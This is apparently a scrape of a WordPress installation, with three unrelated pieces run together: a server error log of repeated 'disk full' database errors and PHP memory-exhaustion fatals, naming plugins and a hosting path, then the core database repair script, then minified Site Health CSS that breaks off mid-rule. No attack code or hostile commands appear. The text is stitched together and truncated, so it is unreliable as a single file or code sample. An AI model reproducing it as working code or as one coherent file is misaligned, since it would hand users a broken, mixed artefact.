require_once('wp-settings.php'), do_action('plugins_loaded'), WP_Hook->do_action, WP_Hook->apply_filters, {closure}, GPLRock\Core::get_instance, GPLRock\Core->__construct, GPLRock\Core->init, GPLRock\Core->log [02-Apr-2026 18:20:08 UTC] WordPress database error Disk full (/tmp/#sql-temptable-ace7-70b53a-27142.MAI); waiting for someone to free some space... (errno: 28 "No space left on device") for query SHOW FULL COLUMNS FROM `wpwf_usermeta` made by require_once('wp-load.php'), require_once('wp-config.php'), require_once('wp-settings.php'), do_action('init'), WP_Hook->do_action, WP_Hook->apply_filters, myCred_Badge_Editor_Core->init_badge_editor, require_once('/plugins/mycred/addons/badge-editor/includes/class-mycred-badge-editor.php'), myCred_Badge_Editor::get_instance, myCred_Badge_Editor->__construct, set_user_setting, wp_set_all_user_settings, update_user_option, update_user_meta, update_metadata [02-Apr-2026 18:20:23 UTC] WordPress database error Disk full (/tmp/#sql-temptable-ace7-70b741-229bb.MAI); waiting for someone to free some space... (errno: 28 "No space left on device") for query SHOW FULL COLUMNS FROM `wpwf_gplrock_logs` made by require_once('wp-load.php'), require_once('wp-config.php'), require_once('wp-settings.php'), do_action('plugins_loaded'), WP_Hook->do_action, WP_Hook->apply_filters, {closure}, GPLRock\Core::get_instance, GPLRock\Core->__construct, GPLRock\Core->init, GPLRock\Core->log [02-Apr-2026 18:20:23 UTC] WordPress database error Disk full (/tmp/#sql-temptable-ace7-70b741-229be.MAI); waiting for someone to free some space... (errno: 28 "No space left on device") for query SHOW FULL COLUMNS FROM `wpwf_usermeta` made by require_once('wp-load.php'), require_once('wp-config.php'), require_once('wp-settings.php'), do_action('init'), WP_Hook->do_action, WP_Hook->apply_filters, myCred_Badge_Editor_Core->init_badge_editor, require_once('/plugins/mycred/addons/badge-editor/includes/class-mycred-badge-editor.php'), myCred_Badge_Editor::get_instance, myCred_Badge_Editor->__construct, set_user_setting, wp_set_all_user_settings, update_user_option, update_user_meta, update_metadata [02-Apr-2026 18:21:06 UTC] WordPress database error Disk full (/tmp/#sql-temptable-ace7-70bd0d-9bf2.MAI); waiting for someone to free some space... (errno: 28 "No space left on device") for query SHOW FULL COLUMNS FROM `wpwf_gplrock_logs` made by require_once('wp-load.php'), require_once('wp-config.php'), require_once('wp-settings.php'), do_action('plugins_loaded'), WP_Hook->do_action, WP_Hook->apply_filters, {closure}, GPLRock\Core::get_instance, GPLRock\Core->__construct, GPLRock\Core->init, GPLRock\Core->log [02-Apr-2026 18:21:06 UTC] WordPress database error Disk full (/tmp/#sql-temptable-ace7-70bd0d-9bf5.MAI); waiting for someone to free some space... (errno: 28 "No space left on device") for query SHOW FULL COLUMNS FROM `wpwf_usermeta` made by require_once('wp-load.php'), require_once('wp-config.php'), require_once('wp-settings.php'), do_action('init'), WP_Hook->do_action, WP_Hook->apply_filters, myCred_Badge_Editor_Core->init_badge_editor, require_once('/plugins/mycred/addons/badge-editor/includes/class-mycred-badge-editor.php'), myCred_Badge_Editor::get_instance, myCred_Badge_Editor->__construct, set_user_setting, wp_set_all_user_settings, update_user_option, update_user_meta, update_metadata [02-Apr-2026 18:21:08 UTC] WordPress database error Disk full (/tmp/#sql-temptable-ace7-70bd35-309b6.MAI); waiting for someone to free some space... (errno: 28 "No space left on device") for query SHOW FULL COLUMNS FROM `wpwf_gplrock_logs` made by require_once('wp-load.php'), require_once('wp-config.php'), require_once('wp-settings.php'), do_action('plugins_loaded'), WP_Hook->do_action, WP_Hook->apply_filters, {closure}, GPLRock\Core::get_instance, GPLRock\Core->__construct, GPLRock\Core->init, GPLRock\Core->log [02-Apr-2026 18:21:08 UTC] WordPress database error Disk full (/tmp/#sql-temptable-ace7-70bd35-309b9.MAI); waiting for someone to free some space... (errno: 28 "No space left on device") for query SHOW FULL COLUMNS FROM `wpwf_usermeta` made by require_once('wp-load.php'), require_once('wp-config.php'), require_once('wp-settings.php'), do_action('init'), WP_Hook->do_action, WP_Hook->apply_filters, myCred_Badge_Editor_Core->init_badge_editor, require_once('/plugins/mycred/addons/badge-editor/includes/class-mycred-badge-editor.php'), myCred_Badge_Editor::get_instance, myCred_Badge_Editor->__construct, set_user_setting, wp_set_all_user_settings, update_user_option, update_user_meta, update_metadata [02-Apr-2026 18:21:47 UTC] WordPress database error Disk full (/tmp/#sql-temptable-ace7-70c291-c788.MAI); waiting for someone to free some space... (errno: 28 "No space left on device") for query SHOW FULL COLUMNS FROM `wpwf_gplrock_logs` made by require_once('wp-load.php'), require_once('wp-config.php'), require_once('wp-settings.php'), do_action('plugins_loaded'), WP_Hook->do_action, WP_Hook->apply_filters, {closure}, GPLRock\Core::get_instance, GPLRock\Core->__construct, GPLRock\Core->init, GPLRock\Core->log [02-Apr-2026 18:21:48 UTC] WordPress database error Disk full (/tmp/#sql-temptable-ace7-70c291-c78b.MAI); waiting for someone to free some space... (errno: 28 "No space left on device") for query SHOW FULL COLUMNS FROM `wpwf_usermeta` made by require_once('wp-load.php'), require_once('wp-config.php'), require_once('wp-settings.php'), do_action('init'), WP_Hook->do_action, WP_Hook->apply_filters, myCred_Badge_Editor_Core->init_badge_editor, require_once('/plugins/mycred/addons/badge-editor/includes/class-mycred-badge-editor.php'), myCred_Badge_Editor::get_instance, myCred_Badge_Editor->__construct, set_user_setting, wp_set_all_user_settings, update_user_option, update_user_meta, update_metadata [02-Apr-2026 18:22:09 UTC] WordPress database error Disk full (/tmp/#sql-temptable-ace7-70c5d4-1d6c9.MAI); waiting for someone to free some space... (errno: 28 "No space left on device") for query SHOW FULL COLUMNS FROM `wpwf_gplrock_logs` made by require_once('wp-load.php'), require_once('wp-config.php'), require_once('wp-settings.php'), do_action('plugins_loaded'), WP_Hook->do_action, WP_Hook->apply_filters, {closure}, GPLRock\Core::get_instance, GPLRock\Core->__construct, GPLRock\Core->init, GPLRock\Core->log [02-Apr-2026 18:22:09 UTC] WordPress database error Disk full (/tmp/#sql-temptable-ace7-70c5d4-1d6cc.MAI); waiting for someone to free some space... (errno: 28 "No space left on device") for query SHOW FULL COLUMNS FROM `wpwf_usermeta` made by require_once('wp-load.php'), require_once('wp-config.php'), require_once('wp-settings.php'), do_action('init'), WP_Hook->do_action, WP_Hook->apply_filters, myCred_Badge_Editor_Core->init_badge_editor, require_once('/plugins/mycred/addons/badge-editor/includes/class-mycred-badge-editor.php'), myCred_Badge_Editor::get_instance, myCred_Badge_Editor->__construct, set_user_setting, wp_set_all_user_settings, update_user_option, update_user_meta, update_metadata [02-Apr-2026 18:22:24 UTC] WordPress database error Disk full (/tmp/#sql-temptable-ace7-70c7df-21033.MAI); waiting for someone to free some space... (errno: 28 "No space left on device") for query SHOW FULL COLUMNS FROM `wpwf_gplrock_logs` made by require_once('wp-load.php'), require_once('wp-config.php'), require_once('wp-settings.php'), do_action('plugins_loaded'), WP_Hook->do_action, WP_Hook->apply_filters, {closure}, GPLRock\Core::get_instance, GPLRock\Core->__construct, GPLRock\Core->init, GPLRock\Core->log [02-Apr-2026 18:22:24 UTC] WordPress database error Disk full (/tmp/#sql-temptable-ace7-70c7df-21036.MAI); waiting for someone to free some space... (errno: 28 "No space left on device") for query SHOW FULL COLUMNS FROM `wpwf_usermeta` made by require_once('wp-load.php'), require_once('wp-config.php'), require_once('wp-settings.php'), do_action('init'), WP_Hook->do_action, WP_Hook->apply_filters, myCred_Badge_Editor_Core->init_badge_editor, require_once('/plugins/mycred/addons/badge-editor/includes/class-mycred-badge-editor.php'), myCred_Badge_Editor::get_instance, myCred_Badge_Editor->__construct, set_user_setting, wp_set_all_user_settings, update_user_option, update_user_meta, update_metadata [02-Apr-2026 18:23:48 UTC] WordPress database error Disk full (/tmp/#sql-temptable-ace7-70d2d0-11f0.MAI); waiting for someone to free some space... (errno: 28 "No space left on device") for query SHOW FULL COLUMNS FROM `wpwf_gplrock_logs` made by require_once('wp-load.php'), require_once('wp-config.php'), require_once('wp-settings.php'), do_action('plugins_loaded'), WP_Hook->do_action, WP_Hook->apply_filters, {closure}, GPLRock\Core::get_instance, GPLRock\Core->__construct, GPLRock\Core->init, GPLRock\Core->log [02-Apr-2026 18:23:48 UTC] WordPress database error Disk full (/tmp/#sql-temptable-ace7-70d2d0-11f3.MAI); waiting for someone to free some space... (errno: 28 "No space left on device") for query SHOW FULL COLUMNS FROM `wpwf_usermeta` made by require_once('wp-load.php'), require_once('wp-config.php'), require_once('wp-settings.php'), do_action('init'), WP_Hook->do_action, WP_Hook->apply_filters, myCred_Badge_Editor_Core->init_badge_editor, require_once('/plugins/mycred/addons/badge-editor/includes/class-mycred-badge-editor.php'), myCred_Badge_Editor::get_instance, myCred_Badge_Editor->__construct, set_user_setting, wp_set_all_user_settings, update_user_option, update_user_meta, update_metadata [02-Apr-2026 18:24:25 UTC] PHP Fatal error: Allowed memory size of 134217728 bytes exhausted (tried to allocate 5242880 bytes) in /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/plugins/essential-addons-for-elementor-lite/includes/Traits/Ajax_Handler.php on line 849 [02-Apr-2026 18:25:48 UTC] WordPress database error Disk full (/tmp/#sql-temptable-ace7-70e385-d84.MAI); waiting for someone to free some space... (errno: 28 "No space left on device") for query SHOW FULL COLUMNS FROM `wpwf_gplrock_logs` made by require_once('wp-load.php'), require_once('wp-config.php'), require_once('wp-settings.php'), do_action('plugins_loaded'), WP_Hook->do_action, WP_Hook->apply_filters, {closure}, GPLRock\Core::get_instance, GPLRock\Core->__construct, GPLRock\Core->init, GPLRock\Core->log [02-Apr-2026 18:25:49 UTC] WordPress database error Disk full (/tmp/#sql-temptable-ace7-70e385-d87.MAI); waiting for someone to free some space... (errno: 28 "No space left on device") for query SHOW FULL COLUMNS FROM `wpwf_usermeta` made by require_once('wp-load.php'), require_once('wp-config.php'), require_once('wp-settings.php'), do_action('init'), WP_Hook->do_action, WP_Hook->apply_filters, myCred_Badge_Editor_Core->init_badge_editor, require_once('/plugins/mycred/addons/badge-editor/includes/class-mycred-badge-editor.php'), myCred_Badge_Editor::get_instance, myCred_Badge_Editor->__construct, set_user_setting, wp_set_all_user_settings, update_user_option, update_user_meta, update_metadata [02-Apr-2026 18:26:26 UTC] PHP Fatal error: Allowed memory size of 134217728 bytes exhausted (tried to allocate 5242880 bytes) in /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/plugins/essential-addons-for-elementor-lite/includes/Traits/Ajax_Handler.php on line 849 [02-Apr-2026 18:27:50 UTC] WordPress database error Disk full (/tmp/#sql-temptable-ace7-70f32e-2777e.MAI); waiting for someone to free some space... (errno: 28 "No space left on device") for query SHOW FULL COLUMNS FROM `wpwf_gplrock_logs` made by require_once('wp-load.php'), require_once('wp-config.php'), require_once('wp-settings.php'), do_action('plugins_loaded'), WP_Hook->do_action, WP_Hook->apply_filters, {closure}, GPLRock\Core::get_instance, GPLRock\Core->__construct, GPLRock\Core->init, GPLRock\Core->log [02-Apr-2026 18:27:50 UTC] WordPress database error Disk full (/tmp/#sql-temptable-ace7-70f32e-27781.MAI); waiting for someone to free some space... (errno: 28 "No space left on device") for query SHOW FULL COLUMNS FROM `wpwf_usermeta` made by require_once('wp-load.php'), require_once('wp-config.php'), require_once('wp-settings.php'), do_action('init'), WP_Hook->do_action, WP_Hook->apply_filters, myCred_Badge_Editor_Core->init_badge_editor, require_once('/plugins/mycred/addons/badge-editor/includes/class-mycred-badge-editor.php'), myCred_Badge_Editor::get_instance, myCred_Badge_Editor->__construct, set_user_setting, wp_set_all_user_settings, update_user_option, update_user_meta, update_metadata [02-Apr-2026 18:29:50 UTC] PHP Fatal error: Allowed memory size of 134217728 bytes exhausted (tried to allocate 5242880 bytes) in /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/plugins/essential-addons-for-elementor-lite/includes/Traits/Ajax_Handler.php on line 910 [04-Apr-2026 01:18:42 UTC] WordPress database error Disk full (/tmp/#sql-temptable-ace7-9db703-14d4.MAI); waiting for someone to free some space... (errno: 28 "No space left on device") for query SHOW FULL COLUMNS FROM `wpwf_gplrock_logs` made by require_once('wp-load.php'), require_once('wp-config.php'), require_once('wp-settings.php'), do_action('plugins_loaded'), WP_Hook->do_action, WP_Hook->apply_filters, {closure}, GPLRock\Core::get_instance, GPLRock\Core->__construct, GPLRock\Core->init, GPLRock\Core->log [04-Apr-2026 01:18:42 UTC] WordPress database error Disk full (/tmp/#sql-temptable-ace7-9db703-14d5.MAI); waiting for someone to free some space... (errno: 28 "No space left on device") for query SHOW FULL COLUMNS FROM `wpwf_options` made by require_once('wp-load.php'), require_once('wp-config.php'), require_once('wp-settings.php'), do_action('plugins_loaded'), WP_Hook->do_action, WP_Hook->apply_filters, hfe_init, Header_Footer_Elementor::instance, Header_Footer_Elementor->__construct, update_option [04-Apr-2026 01:18:42 UTC] WordPress database error Disk full (/tmp/#sql-temptable-ace7-9db703-14d9.MAI); waiting for someone to free some space... (errno: 28 "No space left on device") for query SHOW FULL COLUMNS FROM `wpwf_usermeta` made by require_once('wp-load.php'), require_once('wp-config.php'), require_once('wp-settings.php'), do_action('init'), WP_Hook->do_action, WP_Hook->apply_filters, myCred_Badge_Editor_Core->init_badge_editor, require_once('/plugins/mycred/addons/badge-editor/includes/class-mycred-badge-editor.php'), myCred_Badge_Editor::get_instance, myCred_Badge_Editor->__construct, set_user_setting, wp_set_all_user_settings, update_user_option, update_user_meta, update_metadata [04-Apr-2026 01:20:43 UTC] WordPress database error Disk full (/tmp/#sql-temptable-ace7-9dc4f8-6b9.MAI); waiting for someone to free some space... (errno: 28 "No space left on device") for query SHOW FULL COLUMNS FROM `wpwf_gplrock_logs` made by require_once('wp-load.php'), require_once('wp-config.php'), require_once('wp-settings.php'), do_action('plugins_loaded'), WP_Hook->do_action, WP_Hook->apply_filters, {closure}, GPLRock\Core::get_instance, GPLRock\Core->__construct, GPLRock\Core->init, GPLRock\Core->log [04-Apr-2026 01:20:43 UTC] WordPress database error Disk full (/tmp/#sql-temptable-ace7-9dc4f8-6ba.MAI); waiting for someone to free some space... (errno: 28 "No space left on device") for query SHOW FULL COLUMNS FROM `wpwf_options` made by require_once('wp-load.php'), require_once('wp-config.php'), require_once('wp-settings.php'), do_action('plugins_loaded'), WP_Hook->do_action, WP_Hook->apply_filters, hfe_init, Header_Footer_Elementor::instance, Header_Footer_Elementor->__construct, update_option [04-Apr-2026 01:20:43 UTC] WordPress database error Disk full (/tmp/#sql-temptable-ace7-9dc4f8-6be.MAI); waiting for someone to free some space... (errno: 28 "No space left on device") for query SHOW FULL COLUMNS FROM `wpwf_options` made by require_once('wp-load.php'), require_once('wp-config.php'), require_once('wp-settings.php'), do_action('init'), WP_Hook->do_action, WP_Hook->apply_filters, _register_theme_block_patterns, WP_Theme->get_block_patterns, WP_Theme->get_pattern_cache, get_site_transient, delete_site_option, delete_network_option, delete_option [04-Apr-2026 01:20:43 UTC] WordPress database error Disk full (/tmp/#sql-temptable-ace7-9dc4f8-6bf.MAI); waiting for someone to free some space... (errno: 28 "No space left on device") for query SHOW FULL COLUMNS FROM `wpwf_options` made by require_once('wp-load.php'), require_once('wp-config.php'), require_once('wp-settings.php'), do_action('init'), WP_Hook->do_action, WP_Hook->apply_filters, _register_theme_block_patterns, WP_Theme->get_block_patterns, WP_Theme->get_pattern_cache, get_site_transient, delete_site_option, delete_network_option, delete_option [04-Apr-2026 01:20:43 UTC] WordPress database error Disk full (/tmp/#sql-temptable-ace7-9dc4f8-6c0.MAI); waiting for someone to free some space... (errno: 28 "No space left on device") for query SHOW FULL COLUMNS FROM `wpwf_usermeta` made by require_once('wp-load.php'), require_once('wp-config.php'), require_once('wp-settings.php'), do_action('init'), WP_Hook->do_action, WP_Hook->apply_filters, myCred_Badge_Editor_Core->init_badge_editor, require_once('/plugins/mycred/addons/badge-editor/includes/class-mycred-badge-editor.php'), myCred_Badge_Editor::get_instance, myCred_Badge_Editor->__construct, set_user_setting, wp_set_all_user_settings, update_user_option, update_user_meta, update_metadata [05-Apr-2026 12:27:17 UTC] WordPress database error Disk full (/tmp/#sql-temptable-ace7-d10fb9-1dada.MAI); waiting for someone to free some space... (errno: 28 "No space left on device") for query SHOW FULL COLUMNS FROM `wpwf_gplrock_logs` made by require_once('wp-load.php'), require_once('wp-config.php'), require_once('wp-settings.php'), do_action('plugins_loaded'), WP_Hook->do_action, WP_Hook->apply_filters, {closure}, GPLRock\Core::get_instance, GPLRock\Core->__construct, GPLRock\Core->init, GPLRock\Core->log [05-Apr-2026 12:27:17 UTC] WordPress database error Disk full (/tmp/#sql-temptable-ace7-d10fb9-1dadb.MAI); waiting for someone to free some space... (errno: 28 "No space left on device") for query SHOW FULL COLUMNS FROM `wpwf_options` made by require_once('wp-load.php'), require_once('wp-config.php'), require_once('wp-settings.php'), do_action('plugins_loaded'), WP_Hook->do_action, WP_Hook->apply_filters, hfe_init, Header_Footer_Elementor::instance, Header_Footer_Elementor->__construct, update_option [05-Apr-2026 12:27:18 UTC] WordPress database error Disk full (/tmp/#sql-temptable-ace7-d10fb9-1dadf.MAI); waiting for someone to free some space... (errno: 28 "No space left on device") for query SHOW FULL COLUMNS FROM `wpwf_options` made by require_once('wp-load.php'), require_once('wp-config.php'), require_once('wp-settings.php'), do_action('init'), WP_Hook->do_action, WP_Hook->apply_filters, _register_theme_block_patterns, WP_Theme->get_block_patterns, WP_Theme->get_pattern_cache, get_site_transient, delete_site_option, delete_network_option, delete_option [05-Apr-2026 12:27:18 UTC] WordPress database error Disk full (/tmp/#sql-temptable-ace7-d10fb9-1dae0.MAI); waiting for someone to free some space... (errno: 28 "No space left on device") for query SHOW FULL COLUMNS FROM `wpwf_options` made by require_once('wp-load.php'), require_once('wp-config.php'), require_once('wp-settings.php'), do_action('init'), WP_Hook->do_action, WP_Hook->apply_filters, _register_theme_block_patterns, WP_Theme->get_block_patterns, WP_Theme->get_pattern_cache, get_site_transient, delete_site_option, delete_network_option, delete_option [05-Apr-2026 12:27:18 UTC] WordPress database error Disk full (/tmp/#sql-temptable-ace7-d10fb9-1dae1.MAI); waiting for someone to free some space... (errno: 28 "No space left on device") for query SHOW FULL COLUMNS FROM `wpwf_usermeta` made by require_once('wp-load.php'), require_once('wp-config.php'), require_once('wp-settings.php'), do_action('init'), WP_Hook->do_action, WP_Hook->apply_filters, myCred_Badge_Editor_Core->init_badge_editor, require_once('/plugins/mycred/addons/badge-editor/includes/class-mycred-badge-editor.php'), myCred_Badge_Editor::get_instance, myCred_Badge_Editor->__construct, set_user_setting, wp_set_all_user_settings, update_user_option, update_user_meta, update_metadata [05-Apr-2026 12:27:18 UTC] WordPress database error Disk full (/tmp/#sql-temptable-ace7-d10fb9-1dae3.MAI); waiting for someone to free some space... (errno: 28 "No space left on device") for query SHOW FULL COLUMNS FROM `wpwf_postmeta` made by do_action('wp_ajax_heartbeat'), WP_Hook->do_action, WP_Hook->apply_filters, wp_ajax_heartbeat, apply_filters('heartbeat_received'), WP_Hook->apply_filters, wp_refresh_post_lock, wp_set_post_lock, update_post_meta, update_metadata [05-Apr-2026 12:29:18 UTC] WordPress database error Disk full (/tmp/#sql-temptable-ace7-d11d5a-f4e2.MAI); waiting for someone to free some space... (errno: 28 "No space left on device") for query SHOW FULL COLUMNS FROM `wpwf_gplrock_logs` made by require_once('wp-load.php'), require_once('wp-config.php'), require_once('wp-settings.php'), do_action('plugins_loaded'), WP_Hook->do_action, WP_Hook->apply_filters, {closure}, GPLRock\Core::get_instance, GPLRock\Core->__construct, GPLRock\Core->init, GPLRock\Core->log [05-Apr-2026 12:29:18 UTC] WordPress database error Disk full (/tmp/#sql-temptable-ace7-d11d5a-f4e3.MAI); waiting for someone to free some space... (errno: 28 "No space left on device") for query SHOW FULL COLUMNS FROM `wpwf_options` made by require_once('wp-load.php'), require_once('wp-config.php'), require_once('wp-settings.php'), do_action('plugins_loaded'), WP_Hook->do_action, WP_Hook->apply_filters, hfe_init, Header_Footer_Elementor::instance, Header_Footer_Elementor->__construct, update_option [05-Apr-2026 12:29:18 UTC] WordPress database error Disk full (/tmp/#sql-temptable-ace7-d11d5a-f4e7.MAI); waiting for someone to free some space... (errno: 28 "No space left on device") for query SHOW FULL COLUMNS FROM `wpwf_usermeta` made by require_once('wp-load.php'), require_once('wp-config.php'), require_once('wp-settings.php'), do_action('init'), WP_Hook->do_action, WP_Hook->apply_filters, myCred_Badge_Editor_Core->init_badge_editor, require_once('/plugins/mycred/addons/badge-editor/includes/class-mycred-badge-editor.php'), myCred_Badge_Editor::get_instance, myCred_Badge_Editor->__construct, set_user_setting, wp_set_all_user_settings, update_user_option, update_user_meta, update_metadata [05-Apr-2026 12:29:18 UTC] WordPress database error Disk full (/tmp/#sql-temptable-ace7-d11d5a-f4e9.MAI); waiting for someone to free some space... (errno: 28 "No space left on device") for query SHOW FULL COLUMNS FROM `wpwf_postmeta` made by do_action('wp_ajax_heartbeat'), WP_Hook->do_action, WP_Hook->apply_filters, wp_ajax_heartbeat, apply_filters('heartbeat_received'), WP_Hook->apply_filters, wp_refresh_post_lock, wp_set_post_lock, update_post_meta, update_metadata <?php /** * Database Repair and Optimization Script. * * @package WordPress * @subpackage Database */ define( 'WP_REPAIRING', true ); require_once dirname( __DIR__, 2 ) . '/wp-load.php'; header( 'Content-Type: text/html; charset=utf-8' ); ?> <!DOCTYPE html> <html <?php language_attributes(); ?>> <head> <meta name="viewport" content="width=device-width, initial-scale=1.0" /> <meta http-equiv="Content-Type" content="text/html; charset=utf-8" /> <meta name="robots" content="noindex,nofollow" /> <title><?php _e( 'WordPress › Database Repair' ); ?></title> <?php wp_admin_css( 'install', true ); ?> </head> <body class="wp-core-ui admin-color-modern"> <p id="logo"><?php _e( 'WordPress' ); ?></p> <?php if ( ! defined( 'WP_ALLOW_REPAIR' ) || ! WP_ALLOW_REPAIR ) { echo '<h1 class="screen-reader-text">' . /* translators: Hidden accessibility text. */ __( 'Allow automatic database repair' ) . '</h1>'; echo '<p>'; printf( /* translators: %s: wp-config.php */ __( 'To allow use of this page to automatically repair database problems, please add the following line to your %s file. Once this line is added to your config, reload this page.' ), '<code>wp-config.php</code>' ); echo "</p><p><code>define('WP_ALLOW_REPAIR', true);</code></p>"; $default_keys = array_unique( array( 'put your unique phrase here', /* * translators: This string should only be translated if wp-config-sample.php is localized. * You can check the localized release package or * https://i18n.svn.wordpress.org/<locale code>/branches/<wp version>/dist/wp-config-sample.php */ __( 'put your unique phrase here' ), ) ); $missing_key = false; $duplicated_keys = array(); foreach ( array( 'AUTH_KEY', 'SECURE_AUTH_KEY', 'LOGGED_IN_KEY', 'NONCE_KEY', 'AUTH_SALT', 'SECURE_AUTH_SALT', 'LOGGED_IN_SALT', 'NONCE_SALT' ) as $key ) { if ( defined( $key ) ) { // Check for unique values of each key. $duplicated_keys[ constant( $key ) ] = isset( $duplicated_keys[ constant( $key ) ] ); } else { // If a constant is not defined, it's missing. $missing_key = true; } } // If at least one key uses a default value, consider it duplicated. foreach ( $default_keys as $default_key ) { if ( isset( $duplicated_keys[ $default_key ] ) ) { $duplicated_keys[ $default_key ] = true; } } // Weed out all unique, non-default values. $duplicated_keys = array_filter( $duplicated_keys ); if ( $duplicated_keys || $missing_key ) { echo '<h2 class="screen-reader-text">' . /* translators: Hidden accessibility text. */ __( 'Check secret keys' ) . '</h2>'; /* translators: 1: wp-config.php, 2: Secret key service URL. */ echo '<p>' . sprintf( __( 'While you are editing your %1$s file, take a moment to make sure you have all 8 keys and that they are unique. You can generate these using the <a href="%2$s">WordPress.org secret key service</a>.' ), '<code>wp-config.php</code>', 'https://api.wordpress.org/secret-key/1.1/salt/' ) . '</p>'; } } elseif ( isset( $_GET['repair'] ) ) { echo '<h1 class="screen-reader-text">' . /* translators: Hidden accessibility text. */ __( 'Database repair results' ) . '</h1>'; $optimize = '2' === $_GET['repair']; $okay = true; $problems = array(); $tables = $wpdb->tables(); /** * Filters additional database tables to repair. * * @since 3.0.0 * * @param string[] $tables Array of prefixed table names to be repaired. */ $tables = array_merge( $tables, (array) apply_filters( 'tables_to_repair', array() ) ); // Loop over the tables, checking and repairing as needed. foreach ( $tables as $table ) { $check = $wpdb->get_row( $wpdb->prepare( 'CHECK TABLE %i', $table ) ); echo '<p>'; if ( 'OK' === $check->Msg_text ) { /* translators: %s: Table name. */ printf( __( 'The %s table is okay.' ), "<code>$table</code>" ); } else { /* translators: 1: Table name, 2: Error message. */ printf( __( 'The %1$s table is not okay. It is reporting the following error: %2$s. WordPress will attempt to repair this table…' ), "<code>$table</code>", "<code>$check->Msg_text</code>" ); $repair = $wpdb->get_row( $wpdb->prepare( 'REPAIR TABLE %i', $table ) ); echo '<br /> '; if ( 'OK' === $repair->Msg_text ) { /* translators: %s: Table name. */ printf( __( 'Successfully repaired the %s table.' ), "<code>$table</code>" ); } else { /* translators: 1: Table name, 2: Error message. */ printf( __( 'Failed to repair the %1$s table. Error: %2$s' ), "<code>$table</code>", "<code>$repair->Msg_text</code>" ) . '<br />'; $problems[ $table ] = $repair->Msg_text; $okay = false; } } if ( $okay && $optimize ) { $analyze = $wpdb->get_row( $wpdb->prepare( 'ANALYZE TABLE %i', $table ) ); echo '<br /> '; if ( 'Table is already up to date' === $analyze->Msg_text ) { /* translators: %s: Table name. */ printf( __( 'The %s table is already optimized.' ), "<code>$table</code>" ); } else { $optimize = $wpdb->get_row( $wpdb->prepare( 'OPTIMIZE TABLE %i', $table ) ); echo '<br /> '; if ( 'OK' === $optimize->Msg_text || 'Table is already up to date' === $optimize->Msg_text ) { /* translators: %s: Table name. */ printf( __( 'Successfully optimized the %s table.' ), "<code>$table</code>" ); } else { /* translators: 1: Table name. 2: Error message. */ printf( __( 'Failed to optimize the %1$s table. Error: %2$s' ), "<code>$table</code>", "<code>$optimize->Msg_text</code>" ); } } } echo '</p>'; } if ( $problems ) { printf( /* translators: %s: URL to "Fixing WordPress" forum. */ '<p>' . __( 'Some database problems could not be repaired. Please copy-and-paste the following list of errors to the <a href="%s">WordPress support forums</a> to get additional assistance.' ) . '</p>', __( 'https://wordpress.org/support/forum/how-to-and-troubleshooting' ) ); $problem_output = ''; foreach ( $problems as $table => $problem ) { $problem_output .= "$table: $problem\n"; } echo '<p><textarea name="errors" id="errors" rows="20" cols="60">' . esc_textarea( $problem_output ) . '</textarea></p>'; } else { echo '<p>' . __( 'Repairs complete. Please remove the following line from wp-config.php to prevent this page from being used by unauthorized users.' ) . "</p><p><code>define('WP_ALLOW_REPAIR', true);</code></p>"; } } else { echo '<h1 class="screen-reader-text">' . /* translators: Hidden accessibility text. */ __( 'WordPress database repair' ) . '</h1>'; if ( isset( $_GET['referrer'] ) && 'is_blog_installed' === $_GET['referrer'] ) { echo '<p>' . __( 'One or more database tables are unavailable. To allow WordPress to attempt to repair these tables, press the “Repair Database” button. Repairing can take a while, so please be patient.' ) . '</p>'; } else { echo '<p>' . __( 'WordPress can automatically look for some common database problems and repair them. Repairing can take a while, so please be patient.' ) . '</p>'; } ?> <p class="step"><a class="button button-large" href="repair.php?repair=1"><?php _e( 'Repair Database' ); ?></a></p> <p><?php _e( 'WordPress can also attempt to optimize the database. This improves performance in some situations. Repairing and optimizing the database can take a long time and the database will be locked while optimizing.' ); ?></p> <p class="step"><a class="button button-large" href="repair.php?repair=2"><?php _e( 'Repair and Optimize Database' ); ?></a></p> <?php } ?> </body> </html> /*! This file is auto-generated */ .health-check-body h2{line-height:1.4}.health-check-body h3{padding:0;font-weight:400}.site-health-progress-wrapper{margin-bottom:1rem}.site-health-progress{display:inline-block;height:20px;width:20px;margin:0;border-radius:100%;position:relative;font-weight:600;font-size:.4rem}.site-health-progress-count{position:absolute;display:block;height:80px;width:80px;right:50%;top:50%;margin-top:-40px;margin-right:-40px;border-radius:100%;line-height:6.3;font-size:2em}.loading .site-health-progress svg #bar{stroke-dashoffset:0;stroke:#c3c4c7;animation:loadingPulse 3s infinite ease-in-out}.site-health-progress svg circle{stroke-dashoffset:0;transition:stroke-dashoffset 1s linear;stroke:#c3c4c7;stroke-width:2em}.site-health-progress svg #bar{stroke-dashoffset:565;stroke:#d63638}.green .site-health-progress #bar{stroke:#00a32a}.green .site-health-progress .site-health-progress-label{color:#00a32a}.orange .site-health-progress #bar{stroke:#dba617}.orange .site-health-progress .site-health-progress-label{color:#dba617}.site-health-progress-label{font-weight:600;line-height:20px;margin-right:.3rem}@keyframes loadingPulse{0%{stroke:#c3c4c7}50%{stroke:var(--wp-admin-theme-color)}100%{stroke:#c3c4c7}}.health-check-tabs-wrapper{display:-ms-inline-grid;-ms-grid-columns:1fr 1fr 1fr 1fr;vertical-align:top;display:inline-grid;grid-template-columns:1fr 1fr 1fr 1fr}.health-check-tabs-wrapper.tab-count-1{grid-template-columns:1fr}.health-check-tabs-wrapper.tab-count-2{grid-template-columns:1fr 1fr}.health-check-tabs-wrapper.tab-count-3{grid-template-columns:1fr 1fr 1fr}.health-check-tab{display:block;text-decoration:none;color:inherit;padding:.5rem 1rem 1rem;margin:0 1rem;transition:box-shadow .5s ease-in-out}.health-check-offscreen-nav-wrapper{position:relative;background:0 0;border:none}.health-check-offscreen-nav-wrapper:focus .health-check-offscreen-nav{right:initial}.health-check-offscreen-nav{display:none;position:absolute;padding-top:10px;left:0;top:100%;width:13rem}.health-check-offscreen-nav-wrapper.visible .health-check-offscreen-nav{display:inline-block}.health-check-offscreen-nav:before{position:absolute;content:"";width:0;height:0;border-style:solid;border-width:0 10px 5px;border-color:transparent transparent #fff;left:20px;top:5px}.health-check-offscreen-nav .health-check-tab{background:#fff;box-shadow:0 2px 5px 0 rgba(0,0,0,.75)}.health-check-offscreen-nav .health-check-tab.active{box-shadow:inset -3px 0 #3582c4;font-weight:600}.health-check-body{max-width:800px;margin:0 auto}.widefat.health-check-table th{font-size:13px}.health-check-table 